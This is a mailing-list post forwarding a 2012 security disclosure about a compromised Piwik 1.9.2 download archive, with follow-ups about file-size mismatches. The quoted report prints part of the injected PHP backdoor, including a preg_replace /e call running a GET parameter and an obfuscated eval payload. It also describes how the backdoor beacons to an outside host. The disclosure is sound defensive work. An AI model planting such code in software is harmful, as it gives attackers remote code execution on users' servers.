Fwd: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive

Hans Fr. Nordhaug hans at nordhaug.priv.no
Tue Nov 27 13:22:09 UTC 2012 

Hi,

I just noticed http://piwik.org/blog/2012/11/security-report-piwik-org-webserver-hacked-for-a-few-hours-on-2012-nov-26th/
before I got this message. 

I downloaded http://builds.piwik.org/piwik-1.9.2.tar.gz
and compared it to my local copy of 1.9.2, and all files are unchanged.
It's just the archiving that changed the file size. The Piwik build
manager is a little bit sloppy ...

Regards,
Hans

* Ruslan Mahmatkhanov <cvs-src at yandex.ru> [2012-11-27]:
> => piwik-1.9.2.tar.gz doesn't seem to exist in /usr/ports/distfiles/.
> => Attempting to fetch http://builds.piwik.org/piwik-1.9.2.tar.gz
> fetch: http://builds.piwik.org/piwik-1.9.2.tar.gz: size mismatch: 
> expected 5676196, actual 5676058
> 
> 
> 
> -------- Original message --------
> Subject: [Full-disclosure] Possible infection of Piwik 1.9.2 download 
> archive
> Date: Mon, 26 Nov 2012 21:17:57 +0100
> From: Maximilian Grobecker <max at grobecker-wtal.de>
> To: full-disclosure at lists.grok.org.uk
> 
> Hi,
> 
> this evening I downloaded a fresh archive of Piwik 1.9.2 and found this
> code at the bottom of the /piwik/core/Loader.php file:
> 
> (Just a short snippet)
> -----------snip-------------
> <?php Error_Reporting(0); 	if(isset($_GET['g']) && isset($_GET['s'])) {
>      preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
>    }
>    if (file_exists(dirname(__FILE__)."/lic.log")) exit;
> eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s 
> 
> [.......]
> 
> -----------/snip-------------
> 
> 
> I decoded some parts of this code and found what it does:
> It transmits the requested Host Name (from $_SERVER['HTTP_HOST']) and
> the request URI via POST to http://prostoivse.com/x.php and creates a
> file named "lic.log" in the same directory.
> As long as this file exists it seems that no further POST requests are made.
> 
> At the moment I'm trying to figure out the further sense of this code,
> but it seems that there might also be some kind of backdoor (because of
> the use of $_GET).
> 
> The file in the downloadable archive is dated at
> Nov 26, 2012 / 18:42 UTC.
> 
>  From forums I know that some people downloaded the archive earlier this
> day and don't have this code inside their files.
> 
> At the moment (at 8:08 PM UTC) the archive is downloadable at the
> original Piwik web site with this obfuscated code.
> 
> I contacted the developers and managers of Piwik a few minutes ago about
> this.
> 
> 
> -- 
> Greetings from Wuppertal, Germany
> 
> Max Grobecker

More information about the freebsd-ports mailing list